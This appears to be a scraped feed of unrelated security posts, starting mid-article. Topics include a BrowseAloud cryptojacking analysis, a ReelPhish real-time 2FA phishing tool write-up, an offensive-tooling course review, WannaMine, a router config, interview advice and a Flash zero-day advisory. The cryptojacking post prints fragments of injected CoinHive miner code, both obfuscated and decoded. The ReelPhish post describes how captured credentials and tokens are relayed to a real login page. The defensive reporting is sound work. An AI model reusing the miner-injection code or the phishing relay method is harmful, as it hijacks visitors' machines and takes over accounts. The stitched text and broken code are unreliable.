Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites, including the ICO, the NHS, and local councils (for example, Camden in London), had been serving a cryptominer unbeknownst to visitors, turning their browsers into a free computing cloud at the service of unknown hackers. Although initially only UK sites appeared to be affected, subsequent reports included Irish and US websites as well.


Figure 1: BrowseAloud accessibility tool.

While researchers initially considered the possibility of a new vulnerability being exploited at large, Scott Helme quickly identified the culprit: a foreign JavaScript fragment added to the BrowseAloud JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 

Compromising a third-party tool's JavaScript is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites that use BrowseAloud to provide screen reader support and text translation services.

To analyze the obfuscated code, we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: The Camden Council website as analyzed by Lastline's instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making it impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key popped up on Twitter approximately one week ago; context on this is still not clear, and we will update the blog post as we know more.
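Restated in Python, the configuration logic from the deobfuscated snippet looks like this (CoinHive's throttle value is the fraction of time the mining threads stay idle):

```python
# Python restatement of the deobfuscated CoinHive configuration above:
# one mining thread per ~3 cores, throttled so threads idle 60% of the
# time to stay inconspicuous.
def cpu_config(hardware_concurrency):
    if hardware_concurrency > 1:
        threads = round(hardware_concurrency / 3)
    else:
        threads = 8  # fallback value taken verbatim from the script
    return {"threads": threads, "throttle": 0.6}

print(cpu_config(8))
```

On a typical 8-core visitor machine this yields 3 mining threads, a balance between hash rate and staying unnoticed.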

As of now (16:34), Texthelp, the company behind BrowseAloud, has removed the JavaScript from its servers (as a preventive measure, the browsealoud[.]com domain has also been set to resolve to NXDOMAIN), effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly, how did it happen?

Figure 3: S3 object metadata.

Marco Cova, one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted in an S3 bucket (see Figure 3 above).

In particular, the last-modified time of the ba.js resource showed 2018-02-11T11:14:24, making Sunday morning UK time the first moment this specific version of the JavaScript was served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation), it seems possible that the attackers managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately, we cannot pinpoint the exact cause, as we do not have at our disposal all permissions records for the referenced S3 bucket.

Considering the number of components involved in an average website, it may be concerning that a single compromise managed to affect so many sites. As Scott Helme noted, however, technologies able to thwart this kind of attack already exist: in particular, had those websites implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript file would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers while looking to pay their council tax.
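For reference, an SRI integrity value is just a base64-encoded cryptographic digest of the exact script bytes; the sketch below shows how one could be computed for a file like ba.js (the sample script content is invented):

```python
import base64
import hashlib

# Sketch of how an SRI integrity value is computed for a third-party
# script: a sha384 digest of the exact file bytes, base64-encoded.
# A page pinning this value in its <script integrity="..."> attribute
# would refuse to execute any modified copy of the script.
def sri_sha384(script_bytes):
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

value = sri_sha384(b"console.log('hello');")
print(value)
```

Had the injected CoinHive fragment changed even one byte of ba.js, the hash would no longer match and browsers enforcing SRI would have blocked the script.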

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.

Tips to improve IoT security on your network

Judging by all the media attention that The Internet of Things (or IoT) gets these days, you would think that the world was firmly in the grip of a physical and digital transformation. The truth, though, is that we all are still in the early days of the IoT.

The analyst firm Gartner, for example, puts the number of Internet-connected “things” at just 8.4 billion in 2017, counting both consumer and business applications. That’s a big number, yes, but a much smaller one than the “50 billion devices” or “hundreds of billions of devices” figures that get bandied about in the press.

To read this article in full, please click here


Walk The Plank – Paul’s Security Weekly #547

This week, Zane Lackey of Signal Sciences joins us for an interview! Our very own Larry Pesce delivers the Technical Segment on an intro to the ESP8266 SoC! In the news, we have updates from Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Dark Side Ops 1 & 2 Review

Dark Side Ops 1

A really good overview of the class is here.

I enjoyed the class. This was actually my second time taking it, and it wasn't nearly as overwhelming the second time :-)

I’ll try not to cover what is in Raphael’s article, as it is still applicable; I am assuming you read it before continuing on.

I really enjoyed the Visual Studio time, building Slingshot and Throwback myself, and getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Developers with Windows API experience may be able to greatly extend Slingshot, but I don't think I have enough WinAPI kung fu to do it, and there wasn't enough setup around the "how" to do it consistently unless you have a strong Windows API background. However, one of the labs consisted of adding load-and-run PowerShell functionality, which lets you make use of the plethora of PowerShell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router, and the technique could also be extended to VPS or cloud providers.

Cons of the class:

The Visual Studio piece can get overwhelming, but it definitely gives you a big taste of (Windows) implant development. The class materials are getting slightly dated in some cases; a refresh might be helpful. More Throwback usage and development would be fun (even as optional labs).


Lab 1 was getting a fresh copy of Slingshot back up and running, then adding code for a PowerShell web cradle to get our Slingshot implant running on a remote host, similar to how Metasploit's web delivery does things.

Lab 2 was some devops: setting up servers, OpenVPN to tunnel traffic, and adding HTTPS to our Slingshot codebase.

Lab 3 was initial-access labs (HTA and Chrome plugin exploitation).

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code for sandbox evasion, as it's becoming more common for automated sandbox solutions to be tied to mail gateways or just used by people doing response.

Lab 5 was whitelist bypassing.

Lab 6 was doing some profiling via PowerShell and using Slingshot to run checks on the host.

Labs 7-9 were building a kernel rootkit.

Lab 10 was persistence via COM hijacking and hiding our custom DLL in the registry, and Lab 11 was privilege escalation via a custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

I think the set of courses is having a bit of an identity crisis, mostly due to the 2-day format, and would make a much better class as a 5-day. It is heavily development-focused, meaning you spend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitely suffers a bit due to all the dev time. There was minimal talk of lateral movement, and the whole thing is entirely Windows-focused, so no Linux and no OSX. A suggestion to fix the “ops” piece would be to split into Dark Side Ops - Dev and Dark Side Ops - Operator courses, where the Dev one is solely deving your implant and the Operator course is solely using the implant you dev’d (or were provided). The Silent Break team definitely knows their stuff, and a longer class format or a switch-up would allow them to showcase that more effectively.

GDPR Material and Territorial Scopes

The new EU General Data Protection Regulation will enter into force on 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed, and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

GDPR Preparation: Recent Articles of Note

Company preparations for GDPR compliance are (or should be!) in full swing with the 25th May enforcement date fast looming on the horizon. With that in mind, I found the following set of recent GDPR articles a decent and interesting read. The list was compiled by Brian Pennington of Coalfire, who has kindly allowed me to repost it.

If you are after further GDPR swotting up, you could always read the actual regulation, the EU General Data Protection Regulation (EU-GDPR), and don't forget to read all the Recitals.

If you have any other GDPR-related articles or blogs of note, please post them in the comments.

Heinous Noises – Enterprise Security Weekly #79

This week, Paul is joined by Doug White, host of Secure Digital Life, to interview InfoSecWorld 2018 Speaker Summer Fowler! In the news, we have updates from Cisco, SANS, Scarab, and more on this episode of Enterprise Security Weekly!



ReelPhish: A Real-Time Two-Factor Phishing Tool

Social Engineering and Two-Factor Authentication

Social engineering campaigns are a constant threat to businesses because they target the weakest link in security: people. A typical attack would capture a victim’s username and password and store it for an attacker to reuse later. Two-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is commonly seen as a solution to these threats.

2FA adds an extra layer of authentication on top of the typical username and password. Two common 2FA implementations are one-time passwords and push notifications. One-time passwords are generated by a secondary device, such as a hard token, and tied to a specific user. These passwords typically expire within 30 to 60 seconds and cannot be reused. Push notifications involve sending a prompt to a user’s mobile device and requiring the user to confirm their login attempt. Both of these implementations protect users from traditional phishing campaigns that only capture username and password combinations.
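As a sketch of the first implementation, one-time passwords are typically generated with the standard HOTP/TOTP construction (RFC 4226/6238). The outline below uses only Python's standard library and is illustrative rather than tied to any particular vendor's token:

```python
import hashlib
import hmac
import struct
import time

def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(key: bytes, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based OTP: an HOTP over the current 30-second window."""
    return hotp(key, int(time.time()) // step, digits)
```

Because the counter is derived from the clock, the code expires with the time window and cannot be replayed later – which is exactly the property that the real-time phishing technique described next works around.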

Real-Time Phishing

While 2FA has been strongly recommended by security professionals for both personal and commercial applications, it is not an infallible solution. 2FA implementations have been successfully defeated using real-time phishing techniques. These phishing attacks involve interaction between the attacker and victims in real time.

A simple example would be a phishing website that prompts a user for their one-time password in addition to their username and password. Once a user completes authentication on the phishing website, they are presented with a generic “Login Successful” page and the one-time password remains unused but captured. At this point, the attacker has a brief window of time to reuse the victim’s credentials before expiration.

Social engineering campaigns utilizing these techniques are not new. There have been reports of real-time phishing in the wild as early as 2010. However, these types of attacks have been largely ignored due to the perceived difficulty of launching such attacks. This article aims to change that perception, bring awareness to the problem, and incite new solutions.

Explanation of Tool

To improve social engineering assessments, we developed a tool – named ReelPhish – that simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.
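The session-token bookkeeping described above can be pictured with a small sketch; the class and method names here are hypothetical illustrations, not ReelPhish's actual code:

```python
class SessionRelay:
    """Track captured form steps per victim session token (illustrative)."""

    def __init__(self):
        self._sessions = {}  # token -> ordered list of captured steps

    def record(self, token: str, step: dict) -> int:
        """Store one captured submission; return its position in the flow."""
        steps = self._sessions.setdefault(token, [])
        steps.append(step)
        return len(steps) - 1

    def replay_order(self, token: str):
        """Yield the captured steps in submission order, e.g. username and
        password first, then the one-time token from a second page."""
        yield from self._sessions.get(token, [])
```

Keying everything on the victim's token is what lets a multi-page challenge flow be replayed against the legitimate portal in the right order, one browser instance per victim.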


We have successfully used ReelPhish and this methodology on numerous Mandiant Red Team engagements. The most common scenario we have come across is an externally facing VPN portal with two-factor authentication. To perform the social engineering attack, we make a copy of the real VPN portal’s HTML, JavaScript, and CSS. We use this code to create a phishing site that appears to function like the original.

To facilitate our real-time phishing tool, we embed server-side code on the phishing site that communicates with the tool running on the attacker machine. We also set up an SSH tunnel to the phishing server. When the authentication form on the phishing site is submitted, all submitted credentials are sent over the tunnel to the tool on the attacker’s system. The tool then starts a new web browser instance on the attacker’s system and submits the credentials on the real VPN portal. Figure 1 shows this process in action.

Figure 1: ReelPhish Flow Diagram

We have seen numerous variations of two-factor authentication on VPN portals. In some instances, a token is passed in a “secondary password” field of the authentication form itself. In other cases, the user must respond to a push request on a mobile phone. A user is likely to accept an incoming push request after submitting credentials if the phishing site behaved identically to the real site.

In some situations, we have had to develop more advanced phishing sites that can handle multiple authentication pages and also pass information back and forth between the phishing web server and the tool running on the attacking machine. Our script is capable of handling these scenarios by tracking a victim’s session on the phishing site and associating it with a particular web browser instance running on the attacker’s system. Figure 1 shows a general overview of how our tool would function within an attack scenario.

We are publicly releasing the tool on the FireEye GitHub Repository. Feedback, pull requests, and issues can also be submitted to the Git repository.


Do not abandon 2FA; it is not a perfect solution, but it does add a layer of security. 2FA is a security mechanism that may fail like any other, and organizations must be prepared to mitigate the impact of such a failure.

Configure all services protected by 2FA to minimize attacker impact if the attacker successfully bypasses the 2FA protections. Lowering maximum session duration will limit how much time an attacker has to compromise assets. Enforcing a maximum of one concurrent session per user account will prevent attackers from being active at the same time as the victim. If the service in question is a VPN, implement strict network segmentation. VPN users should only be able to access the resources necessary for their respective roles and responsibilities. Lastly, educate users to recognize, avoid, and report social engineering attempts.
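Two of these mitigations – a short maximum session duration and a single concurrent session per account – can be sketched as follows (an illustrative pseudo-service, not tied to any specific product):

```python
import time

MAX_SESSION_SECONDS = 15 * 60  # a short lifetime narrows the attacker's window

class SessionPolicy:
    """Enforce one concurrent session per user plus a maximum lifetime."""

    def __init__(self):
        self._active = {}  # user -> (token, issued_at)

    def login(self, user: str, token: str) -> None:
        # One concurrent session: a new login evicts any existing session,
        # so an attacker cannot stay active alongside the victim.
        self._active[user] = (token, time.time())

    def is_valid(self, user: str, token: str) -> bool:
        entry = self._active.get(user)
        if entry is None:
            return False
        active_token, issued_at = entry
        return active_token == token and time.time() - issued_at < MAX_SESSION_SECONDS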

By releasing ReelPhish, we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism. This tool is meant to aid security professionals in performing a thorough penetration test from beginning to end.

During our Red Team engagements at Mandiant, getting into an organization’s internal network is only the first step. The tool introduced here aids in the success of this first step. However, the overall success of the engagement varies widely based on the target’s internal security measures. Always work to assess and improve your security posture as a whole. Mandiant provides a variety of services that can assist all types of organizations in both of these activities.

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-Mining Malware is Crippling Enterprise Networks

Cryptocurrencies such as Bitcoin and Ethereum have gone mainstream; it seems like everybody and their brother is looking to buy some crypto and get their piece of the digital currency gold rush. Hackers want a piece of it, too. In addition to hacking ICOs and cryptocurrency exchanges, they’re using crypto-mining malware to “mine” their own “coins.”

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-mining malware isn’t new; last summer, this blog reported on a crypto-mining malware variant called Adylkuzz that came to light in the wake of the WannaCry attacks. Adylkuzz took advantage of the same Windows exploit as WannaCry. In fact, it acted as a sort of “vaccine” against the ransomware, preventing it from taking root in Adylkuzz-infected computers lest it interfere with its Monero-mining operations. However, Adylkuzz wasn’t a kinder, gentler malware. While it didn’t directly lock down systems or access data, it did hijack infected machines’ processing power, and it proved to be far more lucrative than WannaCry; it’s estimated that Adylkuzz raked in 10 times more money for its users than WannaCry.

At first, rogue crypto-miners were viewed as an annoyance; the most they did was slow down machines and perhaps cause problems accessing certain network folders. They were also seen as more of a threat to consumers than businesses. Many variants went after smartphones and other connected devices, overwhelming their processors to the point where the devices could be damaged or even destroyed. However, as crypto-mining malware has evolved, it has become more sophisticated, and hackers are now looking to harvest enterprise processing power.

Move Over, WannaCry; Here Comes WannaMine

Recently, Dark Reading reported on yet another exploit of the EternalBlue tool stolen from the NSA: a crypto-mining malware variant dubbed WannaMine. WannaMine doesn’t attack smartphones and other small IoT devices; it goes after Windows computers, and it isn’t just slowing systems down. Security firm CrowdStrike reports having seen it cause “applications and hardware to crash, causing operational disruptions lasting days and sometimes even weeks.”

A report in Security Week elaborates on how WannaMine appears to be designed to specifically target enterprise networks:

WannaMine, the security researchers explain, employs “living off the land” techniques for persistence, such as Windows Management Instrumentation (WMI) permanent event subscriptions. The malware has a fileless nature, leveraging PowerShell for infection, which makes it difficult to block without the appropriate security tools.

The malware uses credential harvester Mimikatz to acquire legitimate credentials that would allow it to propagate and move laterally. If that fails, however, the worm attempts to exploit the remote system via EternalBlue.

To achieve persistence, WannaMine sets a permanent event subscription that would execute a PowerShell command located in the Event Consumer every 90 minutes.

The malware targets all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003. However, it uses different files and commands for Windows Vista and newer platform iterations.

WannaMine isn’t the only crypto-mining malware harnessing EternalBlue and using Windows Management Instrumentation to propagate. Another Monero-mining worm, dubbed Smominru (aka Ismo), has infected over half a million Windows hosts, most of them servers.

These “next-generation” crypto-mining malware variants have proven extremely difficult to take down. First, the malware is distributed across many hosts. Second, even if all machines on a network are patched against EternalBlue, the malware can still get in using the Mimikatz credential harvester and weak passwords. Finally, some legacy antivirus products do not detect crypto-mining malware because it doesn’t actually write files to an infected machine’s disk.

Protecting Your Organization Against WannaMine and Other Crypto-Mining Malware

There are several ways to protect your enterprise systems from being hijacked for illegal crypto-mining:

  • Keep your systems and software up to date; only unpatched Windows machines are susceptible to the EternalBlue exploit.
  • Use network security software to monitor for and block the activity needed for crypto-miners to work.
  • Ensure that all system users have strong, unique passwords, limiting what an attacker can do with credentials harvested by Mimikatz.

In addition to doing damage to enterprise systems, crypto-mining malware can be employed by real-world threat actors to fund their criminal activity. It’s in everyone’s best interest to put a stop to it.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.


How to configure a Mikrotik router as DHCP-PD Client (Prefix delegation)

Over time, more and more ISPs provide IPv6 addresses to the router (and the clients behind it) via DHCP-PD – that is, DHCPv6 with Prefix Delegation. This allows the ISP to provide you with more than one subnet, letting you use multiple networks without NAT. And forget about NAT with IPv6 – there is no standardized way to do it, and it would break too much. The idea with PD is also that you can use normal home routers and cascade them, which requires that each router delegate a smaller prefix/subnet to the next router. Everything should work without configuration – that was at least the plan of the IETF working group.

Anyway, enough theory; let’s look at some code. My provider requires my router to establish a PPPoE tunnel, which automatically provides the router with an IPv4 address. In my case the config looks like this:

/interface pppoe-client add add-default-route=yes disabled=no interface=ether1vlanTransitModem name=pppoeDslInternet password=XXXX user=XXXX

For IPv6 we need to enable the DHCPv6 client with the following command:

/ipv6 dhcp-client add interface=pppoeDslInternet pool-name=poolIPv6ppp use-peer-dns=no

But a check with

/ipv6 dhcp-client print

will only show you that the client is “searching…”. The reason is that you most likely block incoming connections from the Internet – if you don’t filter, bad boy! :-). You need to allow DHCP replies from the server:

/ipv6 firewall filter add chain=input comment="DHCPv6 server reply" port=547 protocol=udp src-address=fe80::/10

Now you should see something like this

In this case we got a /60 prefix delegated from the ISP, which works out to 16 /64 subnets. The last step is to configure the IP addresses on your internal networks. Yes, you could just statically add the addresses, but if the provider changes the subnet after a disconnect, you would need to reconfigure everything again. It’s better to configure the router to dynamically assign addresses from the delegated pool to the internal interfaces. Just call the following for each of your internal interfaces:

/ipv6 address add from-pool=poolIPv6ppp interface=vlanInternal

The following command shows the prefixes currently assigned to the various internal networks:

/ipv6 address print
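As a sanity check on the subnet arithmetic, Python's ipaddress module confirms that a /60 splits into 16 /64 networks (the prefix below is from the reserved IPv6 documentation range, standing in for whatever your ISP actually delegates):

```python
import ipaddress

# 2001:db8::/32 is the IPv6 documentation range; this /60 stands in
# for whatever prefix your ISP delegates over DHCPv6-PD.
delegated = ipaddress.ip_network("2001:db8:0:10::/60")
subnets = list(delegated.subnets(new_prefix=64))

assert len(subnets) == 16  # one /64 per internal interface, up to 16
```

In general, a /N delegation yields 2^(64-N) /64 networks, so even a modest /60 leaves plenty of room for separate internal VLANs.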

Hey, IPv6 is not that complicated. 🙂

Put Your Dockers On – Business Security Weekly #72

This week, Michael and Paul interview Vik Desai, Managing Director at Accenture! Matt Alderman and Asif Awan of Layered Insight join Michael and Paul for another interview! In the news, we have updates from BehavioSec, RELX, DISCO, Logikcull, and more on this episode of Business Security Weekly!


Stay Classy – Application Security Weekly #04

This week, Keith and Paul discuss the OWASP Application Security Verification Standard! In the news, Intel warns Chinese companies of chip flaw before the U.S. government, bypassing CloudFlare using Internet-wide scan data, and more on this episode of Application Security Weekly!



Ten things you may reveal during job interview (Response to Forbes Article)


Continuing my recent articles on interview preparation, and a few pointers for performing better during the interview, I stumbled upon an article at Forbes - Ten Things Never, Ever to Reveal in a Job Interview by Liz Ryan. I agree with some of the pointers she voiced, but a few might hurt the employee/employer relationship in the long run, or may even be considered borderline unethical. This blog post is an attempt to share my humble opinion, drawing on my experience as both an entrepreneur and an employee. Please read it with a pinch of salt, and do share your comments.

As per the Forbes article, here are the ten things to keep to yourself (with my opinions alongside):

  1. The fact that you got fired from your last job -- or any past job.
    Yes, this is irrelevant and can be avoided in the interview.
    But, if your firing involved a legal case against you, or something the new employer may find in a background check or police verification, it's better to come clean at the start than to be embarrassed later.

  2. The fact that your last manager (or any past manager) was a jerk, a bully, a lousy manager or an idiot, even if all those things were true.
    No need to mention that. No one likes to interview a candidate who bitches about old colleagues or managers.
    It may only be acceptable to an extent if it resulted in a harassment case and you took the "justifiable" decision to leave the firm based on how they treated you.

  3. The fact that you are desperate for a job. Some companies will be turned off by this disclosure, and others will use it as a reason to low-ball you.
    I agree here. Keep the leverage of negotiating the terms with yourself & don't expose all your cards.

  4. The fact that you feel nervous or insecure about parts of the job you're applying for. You don't want to be cocky and say "I can do this job in my sleep!" but you also don't want to express the idea that you are worried about walking into the new job. Don't worry! Everyone is worried about every new job, until you figure out that everyone is faking it anyway so you may as well fake it, too.
    Okay, I do agree with the pointer here, but if you are insecure or feeling nervous, then you might as well give this position a rethink. Pursue a role you are confident you can manage, and don't manipulate the interviewer by showing "confidence" when you have no idea of the role and its responsibilities. Don't express the nervous jitters of the new job, nor be cocky with overconfidence. But be true to yourself and the employer if the assignment is well within your forte.

  5. The fact that you had a clash or conflict with anybody at a past job or that you got written up or put on probation. That's no one's business but yours.
    This is on the same grounds as being fired from your last job or your relationship with your ex-manager. Choose sensibly, as there's no black-and-white answer to handling this situation without knowing the complete context. There can be scenarios where you may want to tell the interviewer (example: your old company may well be a client of the new firm, and you may be allocated to that project (TRUE STORY)).

  6. The fact that you have a personal issue going on that could create scheduling difficulty down the road. Keep that to yourself unless you already know that you need accommodation, and you know what kind of accommodation you need. Otherwise, button your lip. Life takes its own turns. Who knows what will happen a few months from now?
    Okay, this I don't agree with 100%. As an entrepreneur, I would like my employee or a hiring candidate to be upfront with me if they have an ongoing commitment or something that might come up. Most companies hire candidates with a few weeks of probation, and a company may even fire you if you intentionally concealed a planned "engagement" from the firm.
    There is a change in the outlook of companies, and they would appreciate it if you keep them in the loop on ongoing personal issues (briefly) so they can expect the right amount of deliverables. Otherwise, your performance and scheduling may well slide off track, which can cause you problems in the long run.

  7. The fact you're pregnant, unless you're already telling people you don't know well (like the checker at the supermarket). A prospective employer has no right to know the contents of your uterus. It is none of their business.
    I have a different opinion on this, and my answer depends on which trimester you are in. If you are in the first trimester, and by God's grace doing well, telling the employer is your choice. Keep in mind that if the employer is unaware of your health status, they may not be able to judge the kind of workload that is "healthy" for you, or know that you have a medical reason for not doing overtime, etc.
    In the second trimester, you have to be careful, and you should tell the employer about your condition. It will not be well received if, a month after joining, you go on maternity leave. I mean, the employer may well have commitments on ongoing projects and deadlines.
    And if you are in the third trimester, I would recommend you enjoy your pregnancy and not stress about looking for a new job, projects, and deadlines. You have a much more significant responsibility and a full-time job for a few months.

  8. The fact that this job pays a lot more than the other jobs you've held. That information is not relevant and will only hurt you.
    Yes, I agree. Every situation and employer will have their own range of compensation, and the only thing you have to consider is whether it's enough for you, independently of your last paycheck or other jobs.

  9. The fact that you are only planning to remain in your current city for another year or some other period of time. That fact alone will cause many companies not to hire you. They want to retain the right to fire you for any reason or no reason, at any moment -- but they can't deal with the fact that you have your own plans, too -- and that people don't always take a job with the intention of staying in the job forever.
    If you are planning to stay in the city for a year and then move, let the employer know about it. Understand that your relationship with the employer is mutual, and you would expect the same from them. What if the employer is closing the office in six months, hires you while hiding this fact, and then lets you go in six months? I mean, we don't have to lie to each other to hire the perfect person or land the ideal job.

  10. The fact that you know you are overqualified for the job you're interviewing for, and that your plan is to take the job and quickly get promoted to a better job. For some reason, many interviewers find this information off-putting. I have been to countless HR gatherings where I heard folks complaining about "entitled" or "presumptuous" job applicants who had the nerve to say "This job is just a stepping stone for me." How dare they!
    Without a doubt, I agree. But if you are overqualified for the job, or you think you may well get bored, think again before saying yes to the employer. Refer to my previous articles on preparation and performance.

In general, when I appear for an interview, or when I interview someone, I prefer to be straightforward about my current conditions, and I expect the same from the employer. The working relationship is essential and must not start with hiding information that can impact your performance. You will spend a third of your life at your workplace, and I don't think you want to kick it off by keeping critical facts hidden. Before you hide something, think whether it will shock or surprise your employer, and how well they would react when it is disclosed.

Employee or employer, both have their commitments and deadlines. The person taking your interview, or the one managing you, has to know if you have some hiccups along the way; otherwise their performance may also be impacted because of you. So, think over these pointers again and share what you feel is necessary to set the right expectations.

Cheers, and best wishes.

This article shares my opinions and is by no means an offence to the Forbes article. Please take it with a pinch of salt.

Hopefully Intel is working on hardware solution of…

Hopefully Intel is working on a hardware solution to this flaw. An obvious solution is adding a fully isolated device that performs scheduled encryption of all sensitive information (which is not used for computation anyway); decryption would then be done only when the request takes longer than Meltdown's access time. Such a solution would help not only against Meltdown, but also against any attempt to get a password without touching the keyboard.

It Was Wide Open – Paul’s Security Weekly #546

This week, InfoSecWorld speakers Mark Arnold & Will Gragido join us for an interview! John Strand of Black Hills Information Security joins us for the Technical Segment on MITRE! In the news, we have updates from Discord, Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!


Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.


Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommend that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation-state groups will attempt to exploit it in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

Cyber Security Roundup for January 2018

